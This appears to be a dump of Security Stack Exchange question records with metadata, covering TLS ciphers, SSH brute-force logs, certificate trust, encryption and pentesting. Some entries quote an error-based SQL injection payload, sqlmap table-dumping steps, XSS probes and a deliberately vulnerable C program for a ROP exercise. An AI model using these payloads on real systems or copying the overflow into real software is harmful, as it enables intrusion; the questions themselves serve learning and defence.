+DH-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=DH/RSA   Au=DH   Enc=AESGCM(128) Mac=AEAD
+DHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=DH       Au=RSA  Enc=AESGCM(128) Mac=AEAD
+ADH-AES128-GCM-SHA256   TLSv1.2 Kx=DH       Au=None Enc=AESGCM(128) Mac=AEAD
+ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(256) Mac=AEAD
+ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(256) Mac=AEAD
+ECDH-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDH-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(128) Mac=AEAD
+ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(128) Mac=AEAD
+ECDH-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+ECDH-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+
+ +

Indeed, using the former will make SSLLabs not ""find"" for example the cipher suite ""TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x9f)"". It does however work with the latter, four cipher suites in total are found:

+ +
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x9f)   DH 2048 bits   FS  256
+TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x9e)   DH 2048 bits   FS  128
+TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030)   ECDH secp256r1 (eq. 3072 bits RSA)   FS    256
+TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)   ECDH secp256r1 (eq. 3072 bits RSA)   FS    128
+
+ +

However it seems that in that case the more unsecure ciphers are listed/used first.

+ +

How can this be explained?

+",13835,,,,,1/9/2020 21:31,"Why are the following two sets of ciphers ""different""?",,1,0,,,,CC BY-SA 4.0 +223934,1,223936,,1/9/2020 19:20,,1,370,"

I'm a cyber security student and don't do server stuffs on regular basis, I was just wondering how to check SSH login logs and found that it can be checked using sudo cat /var/log/auth.log and checked on my server and there were lots of Failed password for root from [IP] This is a newly installed remote server there's no way I could have logged so many times.

+ +

Then I read it carefully it says Failed password for root from [IP] I was like what? Its for root? I have created my separate user account and except the first time when I had to create a new user account I have never touch root user. It seems to me someone is trying his luck by bruteforcing for credentials. Still, I wanted to ask my seniors here what they think?

+ +

I've nothing running on this server not even apache, nginx etc. Only SSH port is open and AFAIK there's no recent SSH vulnerability in public knowledge.

+ +

And one more important thing I wanted to ask is, being a security student this really grabs my attention and makes me more curious to understand about this. Why would someone run scripts to bruteforce and scan new servers? I mean what would he get, there's barely anything in my case. Initially, I thought maybe he wants to spread malware using my server but if someone has the resources to scan the entire internet he surely has resources to do that himself. Maybe he just want to add servers into his list of compromised servers and use all of them together as a botnet, so many thing going on my mind. What would he do with a new server?

+ +

EDIT: Something I realized today is, as security student I was understanding things from offensive side. Now when I have setup my server I really understand the need to know things from defensive side as a pentester. If any student reading this, I would say understand defensive side as well. I would also learn from now.

+",224747,,,,,1/17/2020 7:29,Is someone trying to hack into my server?,,1,3,1,,,CC BY-SA 4.0 +223935,1,,,1/9/2020 19:30,,2,377,"

I want to do something similar to Ubuntu's signed checksums in distribution and I'm currently stuck on the integrity part. The tutorial here covers most of what I'd like the process to look like (I've modified what I'm writing for Mac syntax since that's what I'm using): https://tutorials.ubuntu.com/tutorial/tutorial-how-to-verify-ubuntu

+ +

Unfortunately the distribution channel I'm using requires that the files are distributed unpacked; otherwise I would have just zipped them up into a tar file or whatever and performed checksums on that.

+ +

It's simple enough to generate the SHA256SUMS file for the files present: find * -type f -exec shasum -b -a 256 {} \; > SHA256SUMS (just would have to remove the sums of the sums files), and then the sums can be verified with shasum -c -a 256 SHA256SUMS

+ +

My concern is that this system only guarantees integrity of files that were present when the sums were generated; an attacker could add additional files and this system would not catch that.

+ +

Staying in-band, one option I thought of is to have the recipient run the same command to generate the sums in a new file and then run diff between the one they generated and the one I generated, but I fear some people might just run the typical verification command. If instead I included a script to run verification, any attacker would just change this script as well, and it also runs the risk of people ignoring the script and running the typical verification strategy.

+ +

It's seeming the best option so far is to have another distribution channel where things are tarred up, have a signed checksum for that file, and then to finish verification you would check the diff between the two file trees. Any other ideas?

+",224744,,,,,1/10/2020 3:05,How to ensure authenticity and integrity of a directory,,1,0,,,,CC BY-SA 4.0 +223939,1,,,1/9/2020 19:56,,1,273,"

I know Nmap has nmap-services file which gives us the list of top 1000 ports/services found on the Internet. But this list seems to be outdated, as the Nmap top 1000 list doesn't include several services used now-a-days (like 27017/mongoDB, 6379/redis, 11211/memcached, etc). Is there any source other than Nmap, which can provide the updated list of top 1000 common ports/services used in the Internet?

+",223262,,,,,1/9/2020 19:56,Is there an updated (non-Nmap) top 100 or top 1000 common ports list?,,0,3,,,,CC BY-SA 4.0 +223941,1,223943,,1/9/2020 21:56,,1,335,"

I have a wildcard valid certificate signed by Certificate Authority. Is it possible to test the https locally from the server without a registered DNS?

+ +

My idea is to bind the domain name with 127.0.0.1 in /etc/hosts.

+ +

The HTML is running on Nginx container and I am using centos 7.

+ +

Is it possible to make an SSL handshake with curl https://<dnsname>.<name>.com:443 or it needs to be public DNS?

+ +

Note: ICMP is disabled but the server is connected to internet

+",224755,,224755,,1/9/2020 22:26,1/9/2020 22:26,Can I test ssl connection locally with a valid certificate (CA) with local dns?,,1,3,1,,,CC BY-SA 4.0 +223942,1,223946,,1/9/2020 22:01,,2,2609,"

Hacker is trying to attack the site by using the following SQL injection query to get the SQL version.

+ +

Using URL site. example:

+ +
www.abc.com/?queryParamString=(SELECT 9701 FROM(SELECT COUNT(*),CONCAT(0x71787a7171,(SELECT (ELT(9701=9701,1))),0x71767a6271,FLOOR(RAND(0)*2))X FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY X)a)
+
+ +

In my application, I am using prepared statmenets that queryParamString as a clear text into DB without any side effects.

+ +

My question:

+ +
    +
  • Is there any best practices to sanitize the URL when PHP server receives a request to render the page.
  • +
  • Or any client-side practices?
  • +
  • Any pointers on how to prevent or how you would deal with this kind of attack
  • +
+",224754,,224754,,1/9/2020 22:08,1/10/2020 8:40,SQL injection using URL query string (web application/php server),,2,4,1,,,CC BY-SA 4.0 +223945,1,223949,,1/9/2020 23:24,,4,1655,"

There are recommendations on this website and in the internet suggesting to never store credentials (e.g. login/password to the database that certain web application is using, or S3 access key on non-AWS instance, etc.) in plain text on the filesystem, apparently due to possibility to recover password from the disk.

+ +

The alternative suggest transmitting secrets from a some sort of remote secret manager over the network, I believe this model expects application that makes use of corresponding secret to store it in memory. Variations of this scheme also support storing secrets in encrypted files on the target host's filesystem and transmit encryption key to the application in some secure way over the network.

+ +

Given that I'd still like to store credentials unencrypted on the local filesystem - let's say due to framework limitation that expects unencrypted password in some local file - would it be possible to still store secrets in plain text in certain file and mitigate the risk by:

+ +
    +
  1. Using encrypted filesystem - so malicious actor who steals the disk still won't be able to read secrets on the encrypted partition.
  2. +
  3. Using ram FS (let's forget about necessity to transmit secrets first for now).
  4. +
  5. In addition to either 1 or 2 limit access to file to a certain user which is used to run the application.
  6. +
+ +

P.S. there are similar questions about this matter, e.g. Storing database password in plain text? (this one is perhaps too vague and therefore it did not receiving a clear answer) and Is it okay for API secret to be stored in plain text or decrypt-able? (more broad in scope; the answers though didn't address particular aspect I'm asking about).

+ +

In addition, I want to clarify that (1) password IS NOT stored in the application configuration, let's just say it is distributed via some secure mechanism to the host during application's deployment; (2) end user who uses web application I'm referring to does not have access to the host.

+ +

My primary question is whether there is something inherently insecure in filesystems that essentially leaves me with options that expect me to never store credentials (for accessing other services from my applications) unencrypted on any filesystem. In order to narrow down the scope, let's limit this question to modern Linux OS.

+",224760,,,,,1/10/2020 1:38,Is there something insecure about storing secrets in plain text on the host FS?,,2,5,3,,,CC BY-SA 4.0 +223950,1,,,1/10/2020 2:14,,1,104,"

Perhaps this is off-topic or too broad to answer but I'm thinking that there must be solutions.

+ +

Some countries are talking about unplugging from the internet and creating their own isolated domestic internet. Russia, recently, ran their own tests about doing this and it has seemed successful.

+ +

How could this, essentially, large LAN network be circumvented?

+",80315,,80315,,1/10/2020 2:29,1/10/2020 6:13,How to circumvent an isolated domestic internet connection?,,1,2,,,,CC BY-SA 4.0 +223958,1,,,1/10/2020 6:21,,0,147,"

In TLS 1.3, handshake messages after Hello and KeyShare--e.g., certificates, signature, finished--are encrypted using an AEAD cipher. Can someone explain what the rationale is? Is it mainly for privacy or integrity, or both?

+ +

It doesn't seem to be for integrity because the Finished message should already do that. If it were there for privacy, though, the benefit seems limited. Server identity can still be leaked by other means such as server_name or SNI extension sent by a client. Did I miss something?

+",43979,,,,,1/10/2020 6:31,TLS handshake encryption,,1,0,,,,CC BY-SA 4.0 +223964,1,,,1/10/2020 7:17,,3,83088,"

I have a personal phone which I use at work, and connect to the WiFi at work. I also brought my personal laptop to work a couple times and connected to the WiFi.

+ +

My question is can my employer see my browsing history from when I was connected to my WiFi at home?

+",224782,,,,,11/19/2021 21:41,Can my employer see my browsing history from my home?,,3,2,,,,CC BY-SA 4.0 +223976,1,223978,,1/10/2020 11:45,,-5,155,"

Cognitive hacking some say is a new type of hacking field and some say it is something that been there for many years. Exploring the chapters of WIKI and using projects like MisinfoSec, got me confused about the differences between disinformation and misinformation when it relates to deepfakes and fake news.

+ +

""Misinformation is misleading. Disinformation is a damn lie."" that is the best one-liner I found explaining the difference. It is very confusing when I find these words used interchangeably while having a very different meaning when related to deepfakes and fakenews. Will you consider Deepfakes and fakenews as disinformation or misinformation hacks?

+",188315,,98538,,1/17/2020 11:23,1/17/2020 11:23,Should we consider Deepfakes and fakenews as disinformation or misinformation?,,1,9,1,1/10/2020 13:49,,CC BY-SA 4.0 +223977,1,,,1/10/2020 12:21,,0,300,"

Is there a way to protect sensitive data which is in RAM? +Our setup is a microcontroller with no hardware support for security. +When there is a need to encrypt data, then the secret key exists in RAM. +Even further- plain text exists in RAM. +So if anyone can have an access to RAM (e.g. jtag), then the sensitive data is in danger?

+",224797,,,,,1/10/2020 14:43,Protect sensitive data in memory,,1,1,,,,CC BY-SA 4.0 +223980,1,223981,,1/10/2020 14:15,,0,110,"

I am currently working on exploiting a potential DOM based XSS on a web app. Currently all of my XSS attempts have been thwarted by Internet Explorers XSS auditor, even after disabling it. While investigating I noticed that the query parameter was outputting weird results if I replace the ""="" with ""[ ]"" which reflects on the web app.

+ +

Example site: www.example.com/search/?q=apples

+ +
 Output: expected
+
+ +

Removing the ""="": www.example.com/search/?q[1]

+ +
 Output: {""1""=>nil}
+
+ +

The {""1""=>nil} reflects in the website, so the URL is being interpreted with odd results in the website.

+ +

Another example: www.example.com/search/?q[Object.prototype.foo][cool]=chill

+ +

Output: {""Object.prototype.foo""=>""chill""} permitted: true>}

+ +

From my understanding, the above is Ruby. Could this be exploited with the DOM based XSS?

+ +

Currently the vulnerable libraries the web app is using are: + jQuery v1.12.4 + React v0.13.3 + React (Fast path)v0.13.3 + Moment.js v2.13.0

+ +

Any help would be greatly appreciated.

+",221249,,,,,1/10/2020 14:41,Potential DOM Based XSS?,,1,0,,,,CC BY-SA 4.0 +223983,1,224137,,1/10/2020 15:08,,2,114,"

In an application I was assessing, I found an interesting piece of code that took my attacker-supplied input and put it into the bindDN while preparing to connect to an LDAP server.

+ +
[USERNAME]@domain.com
+
+ +

Specifically, I can inject whatever I want into the [USERNAME] in the above sample bindDN, including something like testusername@anotherdomain.com@domain.com. I do not control the LDAP URL though. Is there anything risky security-wise with this small bug?

+",128399,,,,,1/13/2020 18:43,Partially controlling LDAP BindDN parameter,,1,1,,,,CC BY-SA 4.0 +223985,1,,,1/10/2020 15:10,,-4,974,"

Aside from possible implementation bugs, which VPN concept aims to offer more protection by design?

+ +
    +
  • SSL VPN (implementation example - OpenVPN)
  • +
  • L2TP/IPSEC (implementation example - Strong Swan)
  • +
+ +

After reading this review, I can't understand how to compare designed security levels of both beyond what the author says. That is, I'm looking for a summary assessing and comparing these designs in more technical deepness from information security point of view.

+ +

I've created a Meta post about how can I improve this question.

+",150500,,150500,,1/12/2020 12:28,1/12/2020 12:28,"Which VPN offers more security conceptually, SSL VPN or L2TP/IPSEC?",,1,1,,,,CC BY-SA 4.0 +223987,1,,,1/10/2020 15:48,,0,161,"

From a DLP perspective, does anyone know what DLP controls to block or monitor this Logitech Flow?

+",198360,,3365,,1/10/2020 15:53,1/10/2020 16:23,“Flow” between computers (Logitech mouse) DLP,,1,0,,,,CC BY-SA 4.0 +223989,1,224004,,1/10/2020 15:53,,1,228,"

I work on a project where DVDs with configuration files and software updates are delivered periodically to end users, and our software loads those discs. For example, we might load a disc with an updated set of hostnames and IP addresses when the network topology is updated, or we might get a disc with virus definition updates.

+ +

Is there any way to sign those discs with GPG or similar such that they could be verified in an offline environment? The systems in question don't have Internet access. Ideally I would like to embed the GPG signature on the discs so they can be self-verifying.

+ +

When I look at how this is typically handled, folks like Debian and Ubuntu will provide a GPG signature alongside their ISO. It's not in the ISO; it's a separate detached file. That doesn't work for us since we deliver physical discs, not ISOs.

+ +
    +
  • Currently we sign individual files on the DVDs. It works, but it's not ideal on a DVD with tens or hundreds of files.
  • +
  • My understanding is that embedded signatures only work with file formats that are designed for them, such as RPM. ISOs don't have such a mechanism. Is that correct?
  • +
  • I suppose we could tar up the contents of the DVDs and store a tarball and signature on the discs instead. Is that the best answer? Any better ideas?
  • +
+ +

I'm open to non-GPG-based solutions. If there's a way to embed a SHA-2 checkum, for instance, that could also work.

+",16974,,,,,1/10/2020 20:42,Is it possible to sign a DVD?,,1,2,,,,CC BY-SA 4.0 +223991,1,,,1/10/2020 15:59,,5,1715,"

There are a number of US Department of Defense (DoD) websites that I need to access on a regular basis (e.g., https://ataaps.csd.disa.mil/ and https://web.mail.mil) that Firefox issues a Warning: Potential Security Risk Ahead with error code SEC_ERROR_UNKNOWN_ISSUER. Looking a little further, it says ""Peer’s Certificate issuer is not recognized.""

+ +

There seem to be some obvious reasons why the DoD would want to issue its own certificates (cf. Why would an organization like the DoD prefer to use its own Root Certificate(s)?) including that this way they are in charge of the security and not someone else and the cost is small since they need certificates for other things.

+ +

My question is from the opposite end and is NOT why does the DoD issue their own certificates, but rather why Firefox does not trust certificates for US government sites by default?

+ +

The more practical question is as adding exceptions for all sites whenever they are encountered without doing even a cursory glance seems like a bad practice, is there a way to globally add an additional CA (???) to make Firefox recognize the US DoD (or whoever is the problem) as a certificate issuer? Does this have drawbacks and open my machine up for additional attacks?

+",16618,,6253,,1/11/2020 14:45,1/21/2022 17:49,Why are many US Department of Defense certificates not trusted by Firefox?,,5,8,2,,,CC BY-SA 4.0 +223996,1,,,1/10/2020 16:45,,0,1174,"

There are many pre-made tools around for brute-forcing RDP credentials, but I haven't found one for username enumeration. Is it possible by design to enumerate potential RDP logins? If not within the standard of the protocol, are there username enumeration vulnerabilities like the CVE-2018-15473 for certain OpenSSH versions?

+",78901,,,,,1/10/2020 16:45,Is RDP user enumeration possible?,,0,2,1,,,CC BY-SA 4.0 +224002,1,,,1/10/2020 20:01,,2,93,"

At my company, we have a new development team that has been completely rewriting all of the code for different parts of the system.

+ +

I've noticed that with one of the recent changes, you can now see the JSON data for all of the fields and values for each field that exist in our database for that particular section of an account where a user is logged in. You can do so simply by using Developer Tools in Chrome.

+ +

Is this a bad idea from an information security perspective? Why or why not?

+ +

Disclaimer: I am not part of any development team, but would like to make others aware so that this can be dealt with appropriately if it is a security concern.

+",43408,,,,,1/10/2020 20:16,Code Change That Resulted in Database Fields and Values Exposed,,1,0,,,,CC BY-SA 4.0 +224005,1,,,1/10/2020 20:51,,2,82,"

Is there a way to establish data sharing between multiple (a couple dozen) businesses where it is the case that some companies don't trust others?

+ +

This means that these companies are willing to share some their sensitive data with only select few, while not so sensitive data they are OK with sharing with all. (They can further restrict access to who sees it based on the sensitivity.) The data includes things like financial information, so one would want to aggregate all the sources of data they have access to to grasp the current situation.

+",224830,,123514,,1/10/2020 20:52,1/10/2020 20:58,Multi-business data sharing and trust issues,,1,4,,,,CC BY-SA 4.0 +224007,1,,,1/10/2020 22:16,,1,182,"

I have a question that might sound a bit weird: A friend of mine (Person A) is being attacked by a former friend (Person B) and now person A asked me for help. Person A and Person B know each other from the internet and Person A used to trust Person B.

+ +

Generally speaking, Person A experiences network issues in his WiFi network.

+ +

Person B has access to Person A's iCloud account and other accounts. Also, Person B may have changed settings (VPN, certificates, ...) or installed apps on Person A's iPhone because Person B told Person A that he knows how to cheat in a smartphone game. Person A doesn't remember anymore what Person B told him to do. Person B never had physical access to the iPhone nor the router.

+ +

Apparently, Person B can launch an attack that stops the internet on Person A's iPhone for several minutes. This only concerns incoming traffic because during these attacks Person A can be heard by me on the call, but Person A can't hear me for the time of the attack.

+ +

This doesn't only affect the iPhone, but also other devices in the same WiFi network. That's why I was thinking that Person A might have access to the router, but he could have never had physical access.

+ +

Person A is rather inexperienced with technology and, as far as I know, Person B is an experienced senior software developer who is interested in pentesting.

+ +

Does anyone have any idea what Person B might have done to Person A's iPhone/router and how he is remotely able to stop his internet?

+ +

I appreciate any help!

+",224832,,,,,1/13/2020 22:27,Attack that stops internet access for several minutes,,1,2,,,,CC BY-SA 4.0 +224013,1,,,1/11/2020 0:02,,1,129,"

While freelance software developers can show their work to potential clients by building personal projects or by showing their previous client's project how can a pentester do the same?

+ +

A pentester can't provide audit reports of previous clients as they are confidential and if he is new he may work for free for few clients and show his work but again, how would he show his work to potential clients without showing the actual reports?

+",224839,,6253,,1/11/2020 14:15,1/11/2020 18:15,How to show your work to potential clients as a pentester?,,2,11,,1/23/2020 10:09,,CC BY-SA 4.0 +224015,1,224017,,1/11/2020 4:29,,78,34722,"

I am not talking about home networks (like hacking my wifi and using it). Can someone from another geographical location steal my IP address in some way?

+ +

For example:

+ +
+

I am angry with you. -> I want to make you suffer and managed to find + your IP address. -> I decided to steal your IP address (meaning + replace my IP address with yours) in such a way that what ever I do + the feds going to be coming after you. -> So I bought some illegal + drugs from the dark web (with my replaced IP address). -> The feds + catches you.

+
+ +

Is this scenario possible?

+",224842,,98538,,1/27/2020 8:35,3/19/2021 22:43,Can someone steal my IP address and use it as their own?,,5,5,27,,,CC BY-SA 4.0 +224016,1,,,1/11/2020 4:39,,0,32,"

I am trying to determine the type of encryption used for a site whose password is stored in the database. The site is built using the fuelphp. It has the password of the form (B65qdjYiMWzizMol7BmG4knKh4OAu9033kSAPcCK5Cs=) which encryption is this?

+",224843,,,,,1/11/2020 4:39,Determine the type of encryption used,,0,2,,1/11/2020 14:12,,CC BY-SA 4.0 +224020,1,,,1/11/2020 7:32,,0,458,"

I'm wondering what is the bank-grade encryption for traffic between a client (say, Windows app) and a server, both on local network. It looks like to use ssl encryption, they must have Internet access to verify SSL certificate from the CA.

+ +

What is the best encryption in practice now?

+ +

(Pardon me for novice's question if you think so, just point me to good read-ups pls)

+",175874,,,,,1/11/2020 8:10,How to encrypt data on local LAN (without Internet)?,,0,4,,1/11/2020 8:09,,CC BY-SA 4.0 +224021,1,,,1/11/2020 8:53,,1,935,"

Our support staff established remote access connection from jumphosts that are isolated within a DMZ. To provide support they need project files (up to a few GB of size) which are stored on a file server within our LAN. Currently, the transfer is always done manually, which consumes a lot of time.

+ +

Therefore, we thought about replicating the files from LAN to DMZ. As I found out, from a security perspective it seems to be best practice to initiate a push from the internal file server to the DMZ file server. But the files need to be changed on the DMZ hosts too. So how about transfering data back?

+ +

We thought about initiating a pull from the internal LAN server. How is this seen from a security point of view? Is there other way to establish two-way file replication between DMZ and LAN that can be considered as best practice?

+ +

BR

+",224850,,,,,1/11/2020 13:43,Secure File Replication between LAN and DMZ,,1,2,,,,CC BY-SA 4.0 +224032,1,,,1/11/2020 16:56,,3,319,"

How to explain to traditional people why they should upgrade their old Windows XP device? <- The interesting point made in the highest upvoted answer to this Q is that a fully patched OS is largely insignificant for the security of an 'average home elder'. On the other hand, regular backups and AV software are essential.

+ +

While I do understand the point about backups, the point about patches vs AV is surprising for me precisely because I was usually being told something opposite.

+ +

Usually, I was being told that for the security of a home user, the first points to consider are: Full disk encryption (defense against device theft), password managers that allow one to abandon reusing passwords (defense against hacked websites), fully patched software and enabled firewall (defense against malware, especially the kinds that infect the computer without a person's knowledge and consent), backups (defense against hardware failure and attacks that somehow slip through the other lines of defense).

+ +

Antivirus software, while still important, nonetheless is dead last on the above list because:

+ +
    +
  • The main purpose of AV is to defend against well-known, indiscriminate threats. This, as I understand, often means threats that would be stopped either by fully patched software or user's diligence (do not run unknown executables, do not click on links in phishing e-mail, ...) in the first place. Even worse, fully patched software paired with user's diligence will be able to stop far more threats than AV.
  • +
  • AVs slow the computer down and open up their own attack vector.
  • +
+ +

Sources (examples): 1, 2, [3](

+ +

Of course user's diligence cannot be relied upon (many claim the human is the weakest link in any security system), especially in the case of home elders, so I'm not going to argue AV software is not important. It's just that I cannot see how can fully patched OS be less important here?

+ +

Note that since we're talking about the 'average home elder' I do not consider it a realistic scenario that they are personally targeted. However, I should note that I've been told about such a case that a hacked website of a parish was installing malware on its visitors' computer. For this reason I'm not sure if it is possible to rule out drive by download.

+",108649,,108649,,1/11/2020 17:23,1/13/2020 11:38,Why is a fully-patched OS less important than AV?,,3,0,1,,,CC BY-SA 4.0 +224035,1,224038,,1/11/2020 17:53,,-1,271,"

I understand that it is easier for a human to intuitively figure out the alleged whereabouts of a machine if that machin's IP address is IPv6, rather than if its IPv4:

+ +

For example, since I configured my smartphone Access Point Name (APN) of the type APN protocol from including the value IPv4 to including the value IPv4/IPv6, generally all different addresses I got after restarting my smartphone about 10 times, started with:

+ +
+

2001:44c8:

+
+ +

That seems to me to indicate that the alleged whereabouts of my machine in Bangkok, Thailand (by 44c8), unless its a proxy.

+ +

My problem

+ +

I have started using IPv6 in the year 2020 and until that year I came across a few IPv4 addresses in my life:
+While all of them IPv4 addresses seemed to me intuitively radically different one from another, and although I never deepened to learn how to calculate alleged whereabouts from an IPv4 addresses, I am quite confident that they won't intuitively expose the alleged whereabouts of a machine so easily as with IPv6 addresses (as with 44c8 for example), with which an hacker only needs to remember that 44c8 represents Bangkok) whether it is or it isn't a proxy hiding the actual whereabouts of a machine.

+ +

Notes

+ +
    +
  • I use the word allegedly because as most here know better than me, a proxy can bias the actual whereabouts of a machine

  • +
  • Of course there is calculation automation for both IP address versions but I aim to ask only about intuitive memorization (""oh, that's probably Bangkok"" ; ""oh, that's probably Paris"" ; ""oh, yes I was right"" ; ""oh, yes I was right"").

  • +
+ +

MY question

+ +

Are IPv4 more intuitively hard to track than IPv6?
+Or, my question is sorely based on some wrong assumption and everything I wrote here is nonsense?

+",,user123574,,,,1/11/2020 18:27,Are IPv4 more intuitively hard to track than IPv6?,,1,0,1,,,CC BY-SA 4.0 +224039,1,,,1/11/2020 18:31,,1,557,"

As a follow-up to the question in The DMZ, is an encrypted drive (full disk encrypted e.g. LUKS, BitLocker) protected against malware if it is not mounted when using a LiveCD?

+ +

The use case is that no other devices are available and there is a need to inspect potentially malicious files.

+ +

The assumptions are;

+ +
    +
  • The malware is not designed to wipe drives and for malware to wipe a drive it must be executed on the host that has a decrypted volume/partition.
  • +
  • When a drive is fully encrypted, there are no unencrypted blocks that the malware can write to without mounting the drive.
  • +
  • Malware can only affect an encrypted drive if it is mounted decrypted.
  • +
  • If malware is executed, when running a LiveCD, it is limited to memory and cannot affect firmware or BIOS.
  • +
  • Methods such as dd are not considered to be part of the threat model.
  • +
+ +

Note: The use of drive is synonymous with disk for the avoidance of doubt.

+",224867,,224867,,1/11/2020 19:12,1/11/2020 21:25,Is an encrypted hard drive immune from malware if it is not mounted when using a LiveCD?,,1,0,,,,CC BY-SA 4.0 +224043,1,,,1/11/2020 19:42,,4,111,"

Assuming that online storage providers are considered untrusted, if files and directories are encrypted, how can these be protected against fingerprinting?

+ +

The files are encrypted using rclone's implementation of Poly1305 and XSalsa20 before being backed up to the cloud provider.

+ +

According to rclone's documentation, the available metadata is file length, file modification date and directory structure.

+ +
    +
  • What can be identified?
  • +
  • What can be inferred?
  • +
  • What attack vectors are there against the encrypted files and directories if the online storage provider is compromised assuming the passphrase is at least 24 characters long and is a combination of alphanumeric and special characters (uppercase and lowercase) as well as salted with similar entropy?
  • +
+ +

The encrypted data is considered to be sensitive.

+ +

How can I protect those files from being fingerprinted and the contents inferred such as ownership, source and the like?

+",224867,,224867,,1/11/2020 20:08,1/11/2020 20:08,How can we protect encrypted files and directories from being fingerprinted when stored on online storage services?,,0,4,1,,,CC BY-SA 4.0 +224044,1,,,1/11/2020 20:15,,3,470,"

I am curious as to how bug hunters / pen testers use DirBuster and GoBuster without getting their IPs banned all the time (which is why I am asking)?

+",79490,,,,,3/21/2022 21:01,Avoiding WAF with DirBuster,,1,1,,,,CC BY-SA 4.0 +224047,1,224061,,1/11/2020 20:36,,1,264,"

For context, the coldcard hardware wallet has a number pad as input. In order to maintain my sanity, I'd like to input an alphanumeric passphrase using a single keypress for each letter or number.

+ +

So for example, the password ""boyhowdy123"" would be typed ""26946939123"".

+ +

I know that doing this loses some security (becomes easier to brute force crack) based on the number of words (or word sequences) that have the same numeric representation using this method as other words (or sequences).

+ +

My question is: approximately how much security is lost here? Am I missing anything that also affects the security of doing this? Is there anything published that analyses this kind of thing?

+",50631,,,,,1/13/2020 13:20,Approximately how much entropy/security is lost by typing passphrase words using a number pad?,,2,2,,,,CC BY-SA 4.0 +224048,1,,,1/11/2020 20:55,,0,30,"

I just heard that somebody uses MD5 for hashing passwords. I thought about helping them to replace the algorithm to Argon2, but I am not sure which strategy to follow. I thought about 3 possible solutions:

+ +
    +
  • hashing the MD5 hash with Argon2 as a quick fix (not sure how secure it would be, because it will inherit the collisions of MD5, but maybe it is good as a temporary solution until we do one of the others)
  • +
  • replacing the hashes at login and removing or locking accounts that did not login after a few months
  • +
  • sending a mail to everybody that their password is compromised and they should use the password reset link immediately and they should not use their old password on any other website (maybe it makes too much panic)
  • +
+ +

But this was just naive thinking, maybe you can come up with a much better solution. Is there anything recommended in this scenario?

+",46259,,,,,1/11/2020 20:55,Strategies to replace password hashing algorithm?,,0,2,,1/11/2020 22:28,,CC BY-SA 4.0 +224050,1,224051,,1/11/2020 22:01,,0,3181,"

I have seen that most companies use the TLS1.2 protocol, why not use the TLS1.3?

+ +

My question here is, what are these pros and cons of both, and currently what is a better option?

+",,user224061,6253,,1/11/2020 22:06,8/10/2020 14:49,TLS1.2 vs TLS1.3,,3,3,,,,CC BY-SA 4.0 +224052,1,,,1/11/2020 22:35,,0,998,"

I am practicing on some vulnerable application, and I am asked to find an injection vulnerability with a payload. it states there is a common and simple filter in place. Then I need to extract the flag value from the chlns table. +So I use SQLmap to find it.

+ +

Please read below and correct me if I am wrong in any stage:

+ +
sqlmap -u 'http://www.site.com/game.php?name=sarah’ --dbs
+
+ +

When I run it, it asks that it is being redirected to facebook, and I press n to not do that. Then it continious and load 3 databases as such:

+ +
-- information_schema
+-- chlns
+-- people
+
+ +

on I run the following query:

+ +
sqlmap -u 'http://www.site.com/game.php?name=sarah’ -D chlns --tables
+
+ +

to get all the tables. After it starts running it gives the below error:

+ +
[ERROR] unable to retrieve the table names for any database
+do you want to use common table existence check? [y/N/q] y
+
+ +

Then it asks for a file or use the default wordlist. Which I used the default option. +At the end it came up with a list of tables (13 overall) which then I used the below code for one of the sample table names:

+ +
sqlmap -u 'http://www.site.com/game.php?name=sarah’ -D chlns T- table --dump
+
+ +

this code asks for the same thing when i run it and want to run it through a worklist. each process takes a long time around 10/15 mins and each time it come up with an error like below:

+ +
HTTP error code: 414 (Request-URI Too Large) [*N times...
+
+ +

And i get nowhere. Am I doing anything wrong here? or is there any easier way? +the excercise mentiones there is a table called chlns but it seems chlns is a database instead. This could be the case as in another excercise chlns was the database and one was the name of the table that flag existed.

+ +

Is there any suggestions to make this process easier or any pro advice?

+ +

Thanks in advance,

+",208524,,208524,,1/12/2020 0:56,1/12/2020 0:56,Is this SQLMap query is correct?,,0,2,,,,CC BY-SA 4.0 +224053,1,224056,,1/11/2020 23:04,,0,1897,"

As far as I know Android (Pie) is encrypted by default with some hardware-based password. But how secure is this encryption?

+ +

I am not talking about password compromise, but if somebody gets my phone, he just needs to turn it on to get data decrypted, so what’s the point? For what cases is this encryption designed?

+",224874,,224874,,1/11/2020 23:11,1/11/2020 23:44,Is Android encryption secure?,,1,9,,1/21/2020 12:32,,CC BY-SA 4.0 +224059,1,224093,,1/12/2020 1:31,,2,621,"

My ROP exploit crashes with segmentation fault for unknown reason. +This is a vulnerable code (compiled via command gcc h2.c -no-pie -fno-stack-protector -m32 -o h2):

+
#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+char string[100];
+void exec_string() {
+    system(string);
+}
+
+void add_bin(int magic) {
+    if (magic == 0xdeadbeef) {
+        strcat(string, "/bin");
+    }
+}
+
+void add_sh(int magic1, int magic2) {
+    if (magic1 == 0xcafebabe && magic2 == 0x0badf00d) {
+        strcat(string, "/sh");
+    }
+}
+
+void vulnerable_function(char* string) {
+    char buffer[100];
+    strcpy(buffer, string);
+}
+
+int main(int argc, char** argv) {
+    string[0] = 0;
+    vulnerable_function(argv[1]);
+    return 0;
+}
+
+

